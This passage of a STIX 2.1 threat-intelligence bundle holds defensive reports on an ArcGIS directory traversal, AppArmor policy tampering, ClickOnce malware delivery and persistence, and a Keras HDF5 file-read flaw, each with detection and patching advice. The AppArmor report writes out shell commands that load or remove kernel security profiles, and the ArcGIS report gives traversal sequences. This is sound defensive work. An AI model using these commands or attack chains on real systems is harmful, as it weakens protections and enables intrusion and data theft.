        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11404"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--29580760-4d2a-5ddf-83e8-202a5f82beb4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: camorreado[.]click",
      "pattern": "[domain-name:value = 'camorreado[.]click']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T19:20:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--359b7a3e-0304-51f6-a2fa-893067df3ddf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a57e4bf9-a543-5130-b346-a1fb400bb453",
      "target_ref": "indicator--29580760-4d2a-5ddf-83e8-202a5f82beb4"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b19bd8be-ee46-507f-97d9-ae670a3742b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a57e4bf9-a543-5130-b346-a1fb400bb453",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e20291b-b4d5-55e1-8d07-8ad7dd6c0472",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a57e4bf9-a543-5130-b346-a1fb400bb453",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a57e4bf9-a543-5130-b346-a1fb400bb453",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-9181: Unauthenticated Directory Traversal in ArcGIS Server",
      "description": "## Overview\n\nArcGIS Server, a core component of Esri's enterprise geospatial platform, is vulnerable to a critical directory traversal (CWE-22) identified as CVE-2026-9181. This vulnerability affects all versions up to and including 12.0. An unauthenticated attacker can remotely exploit this flaw by submitting specially crafted path parameters within HTTP requests. Successful exploitation grants the attacker the ability to read arbitrary files from the underlying server's file system, potentially leading to the exposure of sensitive configuration files, credentials, or other critical data. This poses a significant risk to the confidentiality of organizations utilizing vulnerable ArcGIS Server deployments. The vulnerability carries a CVSS v3.1 base score of 9.8 (Critical).\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies an internet-facing ArcGIS Server instance running a vulnerable version (12.0 or prior).\n2. The attacker constructs a malicious HTTP request containing specially crafted path parameters (e.g., `../`, `..%2f`) targeting specific endpoints on the ArcGIS Server.\n3. This crafted request exploits the directory traversal vulnerability (CWE-22) in ArcGIS Server's request handling logic.\n4. The server incorrectly resolves the malicious path, allowing the request to access files and directories outside the intended web root or application sandbox.\n5. The attacker can then specify the names of sensitive files (e.g., configuration files, system logs, user data) on the server's file system.\n6. ArcGIS Server retrieves and returns the content of these sensitive files to the attacker, leading to unauthorized information disclosure.\n7. The attacker exfiltrates the accessed sensitive data for further analysis or exploitation.\n\n## Impact\n\nIf exploited, CVE-2026-9181 could lead to severe data breaches, compromising the confidentiality and potentially the integrity of systems hosting ArcGIS Server. Attackers could gain access to configuration files containing database credentials, API keys, or other sensitive information, which could then be used for further lateral movement or privilege escalation within the network. This directly impacts organizations relying on ArcGIS Server for critical mapping and spatial data operations, potentially across various sectors including government, critical infrastructure, and defense. The unauthenticated nature and high CVSS score indicate a significant risk, as exploitation does not require any prior access or legitimate user credentials.\n\n## Recommendation\n\n- Immediately patch all ArcGIS Server instances to a version that addresses CVE-2026-9181 as per the vendor advisory from Esri.\n- Review web server access logs for ArcGIS Server (found in `/var/log/apache2/access.log` for Apache, or IIS logs on Windows) for signs of directory traversal attempts, specifically requests containing `../`, `..%2f`, or similar path manipulation sequences in the URI.\n- Ensure proper network segmentation and firewall rules are in place to limit exposure of ArcGIS Server instances to untrusted networks, complementing the patching for `CVE-2026-9181`.\n",
      "published": "2026-07-06T19:20:57Z",
      "labels": [
        "directory-traversal",
        "web-vulnerability",
        "esri",
        "cve"
      ],
      "object_refs": [
        "indicator--29580760-4d2a-5ddf-83e8-202a5f82beb4",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9181"
        },
        {
          "source_name": "reference",
          "url": "https://www.esri.com/arcgis-blog/products/arcgis-enterprise/administration/may-2026-arcgis-security-bulletin"
        },
        {
          "source_name": "reference",
          "url": "https://thehackernews.com/2026/07/threatsday-cloud-bucket-hijacking.html"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--18249059-5dce-5cf2-9750-a644be0e0bd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--151740d4-35bc-577e-9afb-a926fce864d3",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--151740d4-35bc-577e-9afb-a926fce864d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AppArmor Policy Bypass via Direct File Manipulation",
      "description": "## Overview\n\nThis rule detects attempts to bypass AppArmor by directly writing to policy management files. AppArmor is a Linux kernel security module that provides mandatory access control, and direct manipulation of its policy files is highly unusual. The activity is triggered when processes attempt to load, replace, or remove AppArmor profiles by writing to the special kernel interfaces under `/sys/kernel/security/apparmor/`. While legitimate administrative tools like `apparmor_parser` handle policy management, direct interaction with these files from shell utilities or scripts could signify malicious intent. This technique may be used by adversaries to weaken or disable AppArmor protections, introduce malicious profiles, or exploit vulnerabilities in the AppArmor policy parser, often as a component of local privilege escalation chains. The rule is sourced from Elastic and has been actively maintained.\n\n## Attack Chain\n\n1.  Attacker gains initial access to the system (e.g., via compromised service or account).\n2.  Attacker executes a shell (bash, sh, zsh) or scripting language (python, perl) on the target system.\n3.  The shell or scripting language attempts to write to AppArmor policy management files under `/sys/kernel/security/apparmor/`, such as `.load`, `.replace`, or `.remove`. This can be achieved using utilities like `echo`, `tee`, or `cat`.\n4.  The attacker attempts to load a modified or weakened AppArmor profile using `echo \"profile \u003cprofile_name\u003e {...}\" \u003e /sys/kernel/security/apparmor/.load`.\n5.  Alternatively, the attacker attempts to remove an existing profile with `echo \"\u003cprofile_name\u003e\" \u003e /sys/kernel/security/apparmor/.remove`.\n6.  If successful, the AppArmor policy is modified, potentially weakening the security posture.\n7.  The attacker leverages the weakened AppArmor profile to execute previously restricted actions.\n8.  The attacker performs privilege escalation by exploiting the relaxed security constraints.\n\n## Impact\n\nSuccessful exploitation could lead to a complete bypass of AppArmor protections, allowing attackers to perform actions normally restricted by the security policy. This could result in privilege escalation, unauthorized access to sensitive data, and the ability to install malware or perform other malicious activities. The Qualys advisory \"CrackArmor\" details critical AppArmor flaws that enable local privilege escalation to root when these protections are circumvented. The rule is sourced from Elastic and has been actively maintained.\n\n## Recommendation\n\n*   Deploy the Sigma rule `Suspicious AppArmor Policy Modification` to your SIEM and tune for your environment to detect direct writes to AppArmor policy management files.\n*   Enable process creation logging with command-line arguments to capture the full command being executed (reference: `logsource.category: process_creation`).\n*   Investigate any alerts generated by the `Suspicious AppArmor Policy Modification` rule, focusing on the parent process and the content being written to the AppArmor policy files.\n*   Review the investigation guide within the rule's note section for guidance on triage, false positive analysis, response, and remediation.\n",
      "published": "2026-07-03T12:00:00Z",
      "labels": [
        "apparmor",
        "defense-evasion",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt"
        },
        {
          "source_name": "reference",
          "url": "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e968882d-0103-58e7-9fb7-225ff5552a40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e174aa3b-d287-5dd6-bae0-aa65b4ca754c",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--57589b48-f7d3-56fb-a31f-c8ce8a4ca457",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e174aa3b-d287-5dd6-bae0-aa65b4ca754c",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e174aa3b-d287-5dd6-bae0-aa65b4ca754c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Understanding ClickOnce Technology and its Potential for Abuse",
      "description": "## Overview\n\nCrowdStrike has published an analysis of Microsoft's ClickOnce technology, a deployment solution designed to simplify the distribution and updating of applications on Windows systems. This initial part of a two-part series (published June 18, 2026) describes how ClickOnce functions, from the developer's publishing process in Visual Studio to its installation on a user's endpoint. While beneficial for legitimate developers, ClickOnce's key features—minimal user interaction for deployment, no elevated privileges required, self-contained packaging, and self-updating capabilities—make it an attractive vector for threat actors. The article sets the stage for future discussions on how adversaries can weaponize this technology to spread malware, emphasizing the need for defenders to understand its mechanics to build effective detection strategies.\n\n## Impact\n\nWhile this brief focuses on the underlying technology, the inherent design of ClickOnce, allowing applications to be deployed and updated with minimal user interaction and often without administrative privileges, presents a significant risk if abused. Successful exploitation would enable threat actors to distribute malware easily, bypass traditional software installation restrictions, and maintain persistence through the self-updating mechanism. This could lead to widespread infections, data exfiltration, and unauthorized access across organizations that rely on Windows environments, particularly those where users are prone to clicking on seemingly legitimate installation prompts.\n\n## Recommendation\n\n*   Enable comprehensive logging for `dfsvc.exe` (ClickOnce deployment service) process creation and network connections to identify unusual application deployments.\n*   Monitor for the creation and execution of `.application` files, as these are ClickOnce deployment manifests, and unexpected ones could indicate malicious activity.\n*   Implement application whitelisting solutions to restrict the execution of unauthorized ClickOnce applications in user environments.\n*   Educate users on the risks associated with installing software from untrusted sources, even when prompted by seemingly legitimate installation wizards, as per the described ClickOnce deployment process.\n",
      "published": "2026-07-07T07:51:02Z",
      "labels": [
        "clickonce",
        "microsoft",
        "windows",
        "deployment",
        "malware-delivery",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d41fc8bc-5d7a-51f0-b6f4-89bfaa16e1f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f6ac9138-cc3d-5051-9c80-f3cced34fa33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1be7195-4b29-5b09-b485-068feb284e4c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28d9503b-c43f-5ad5-a8bc-d13207e4e82c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8de39f39-bd74-546d-951e-ddf3f8b1d73f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b21c1f30-b80b-5a18-8b5d-c54a5edf468e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology for Stealthy Malware Delivery and Persistence",
      "description": "## Overview\n\nThreat actors are increasingly exploiting Microsoft's ClickOnce application deployment technology to deliver malware and establish persistence on target systems. This abuse, observed by CrowdStrike, takes advantage of ClickOnce's user-friendly deployment, which often requires minimal user interaction to install applications, effectively bypassing traditional security scrutiny typically applied to `.exe` files. Adversaries leverage this by luring users into clicking deceptive links or `.application` files. A significant aspect of this technique is the ability for attackers to push malicious updates to an initially benign-looking ClickOnce application, ensuring the payload executes discreetly within legitimate Microsoft processes like `rundll32.exe` and `dfsvc.exe`. Furthermore, the `.appref-ms` shortcut files created during installation can be manipulated for persistence, allowing actors to maintain remote access and update their C2 infrastructure.\n\n## Attack Chain\n\n1.  Threat actor sends a deceptive link, often via phishing email or malicious website, designed to initiate a Microsoft ClickOnce application deployment when clicked.\n2.  The victim clicks the malicious link or a `.application` file. The ClickOnce deployment service (`dfsvc.exe`) initiates the download and installation of the (potentially initially benign or disguised) ClickOnce application.\n3.  During installation, an `.appref-ms` shortcut file is dropped in the user's Start Menu (`%Users%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`) for offline availability.\n4.  The application deploys without requiring elevated privileges, executing within legitimate Microsoft processes such as `dfsvc.exe`, potentially launching `rundll32.exe`, thus evading typical `.exe` scrutiny.\n5.  The attacker, controlling the ClickOnce deployment server, pushes a malicious update for the previously installed application.\n6.  When the user next launches the application via the `.appref-ms` shortcut, the ClickOnce update mechanism automatically downloads and executes the malicious payload from the controlled server, typically without additional user prompts.\n7.  To ensure continuous persistence, the attacker places the `.appref-ms` file in the user's Startup folder (`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`) or creates a scheduled task to regularly execute it.\n8.  The malicious payload gains execution within a legitimate Microsoft process tree, enabling actions such as remote access, data exfiltration, or further compromise of the system.\n\n## Impact\n\nThe abuse of ClickOnce technology allows threat actors to circumvent common security controls and deliver malware with high stealth. This leads to successful initial access, persistent presence on compromised endpoints, and the ability to update malicious payloads or C2 addresses without detection. Organizations may experience data breaches, ransomware infections, or other forms of system compromise, as security tools often overlook `.application` files and legitimate Windows processes. The widespread unawareness of ClickOnce's security implications among users further exacerbates the risk, making it an effective vector for targeting standard user accounts across various enterprise environments.\n\n## Recommendation\n\n*   Deploy the Sigma rule below to detect suspicious `.appref-ms` file persistence, and investigate all alerts.\n*   Educate users about the risks of clicking on unexpected links or files, particularly those initiating software installations, and emphasize caution around `.application` file types.\n*   Enable Sysmon file event logging (`FileCreate`, `FileCreateStreamHash`, `FileRename`, `FileDelete`) for `.appref-ms` files to activate the detection rule provided.\n*   Monitor process creation events for `dfsvc.exe` and its child processes, looking for unusual network connections or subsequent malicious activity.\n",
      "published": "2026-07-07T20:22:46Z",
      "labels": [
        "clickonce",
        "initial-access",
        "persistence",
        "malware-delivery",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79fbb25e-23c4-59fa-8d17-96fb4dcd6d25",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbacbb55-71e5-55c6-8442-7f5b62226e54",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cbacbb55-71e5-55c6-8442-7f5b62226e54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology, Part 1: Internals and Attack Vector",
      "description": "## Overview\n\nCrowdStrike has published \"Part 1\" of a two-part series detailing a new abuse of Microsoft's ClickOnce technology, a deployment mechanism designed for distributing applications and updates without requiring administrative privileges. This initial part, published on 2026-07-07, provides an in-depth look into the internal workings of ClickOnce, a capability often overlooked by both developers and security professionals. The technology's design, which allows for minimal user interaction and no elevated privileges for application deployment, presents a significant vector for threat actors to spread malware easily. By packaging malicious applications as ClickOnce deployments (typically `.application` files), attackers can bypass traditional security controls and user installation hurdles, facilitating initial access and execution on targeted Windows endpoints. This brief sets the foundation for understanding how this user-friendly feature can be weaponized, preparing defenders for the specific abuse methods and detection strategies to be detailed in Part 2.\n\n## Impact\n\nThe abuse of ClickOnce technology allows threat actors to easily distribute malware, leading to unauthorized initial access and execution on user systems. Its ability to deploy applications without requiring administrative privileges means that even users with standard permissions can inadvertently install malicious software. This bypasses traditional security measures that rely on user privilege escalation or complex installation procedures, making it a highly effective delivery mechanism. While this part of the series does not detail specific campaigns or victim counts, it highlights a fundamental architectural flaw that can be leveraged across various sectors to compromise Windows endpoints, leading to data exfiltration, further compromise, or ransomware deployment.\n\n## Recommendation\n\n*   Familiarize detection engineering teams with the internal workings of Microsoft ClickOnce technology, specifically the execution flow initiated by `.application` files, as detailed in this brief, to better understand potential abuse vectors.\n*   Prepare to deploy specific detection rules and blocking mechanisms for malicious ClickOnce applications upon the release of Part 2 of the CrowdStrike research series, which is referenced in this brief and expected to provide concrete weaponization methods and strategies.\n",
      "published": "2026-07-07T19:26:09Z",
      "labels": [
        "clickonce",
        "malware-delivery",
        "windows",
        "microsoft",
        "deployment-technology",
        "threat-vector"
      ],
      "object_refs": [
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--27f95247-5e84-59c8-98e0-e2f036345dfc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-12480 Arbitrary HDF5 File Read via Virtual Dataset Bypass in keras-team/keras",
      "description": "## Overview\n\nA significant vulnerability, identified as CVE-2026-12480, has been disclosed affecting the `keras-team/keras` open-source library. Published on July 7, 2026, this flaw permits an arbitrary HDF5 file read through a virtual dataset bypass mechanism. While the specific method of exploitation is not detailed in the public advisory, it typically involves an attacker providing a specially crafted HDF5 file to a Keras application or manipulating its processing of HDF5 data. Given Keras's widespread use in machine learning and deep learning applications, which often handle sensitive datasets, model weights, and configuration files, this vulnerability poses a substantial risk. Successful exploitation could allow attackers to access or exfiltrate critical information from the compromised system, impacting data integrity and confidentiality.\n\n## Impact\n\nThe arbitrary HDF5 file read vulnerability (CVE-2026-12480) could lead to severe information disclosure. If exploited, attackers could read any file accessible by the process running the vulnerable Keras application. This includes sensitive data files used for model training, intellectual property in the form of machine learning model weights, configuration files containing API keys or credentials, and potentially other confidential information stored on the host system. While no specific victims or observed exploitation are detailed, the widespread adoption of Keras across various sectors, including research, technology, and finance, suggests a broad potential attack surface.\n\n## Recommendation\n\n*   Prioritize patching for CVE-2026-12480 in all instances of the `keras-team/keras` library immediately. Consult the vendor's guidance for specific patch versions.\n*   Review access controls for systems running Keras applications, limiting the process's ability to read files outside its necessary operational scope to mitigate impact from CVE-2026-12480.\n*   Implement robust input validation for any applications processing external or untrusted HDF5 files using the `keras` library.\n",
      "published": "2026-07-07T07:36:58Z",
      "labels": [
        "vulnerability",
        "arbitrary-file-read",
        "keras",
        "python",
        "machine-learning"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-12480"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14f0a751-6f66-5668-bffc-1bb102454920",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6789422a-406e-549f-940b-3c741a172c6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c3632980-8916-5ff2-8b08-6e6351ce64ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26b935b8-004a-5464-9372-7385005c342b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2957e251-739e-5bea-8dec-0fe42ce8ffd8",
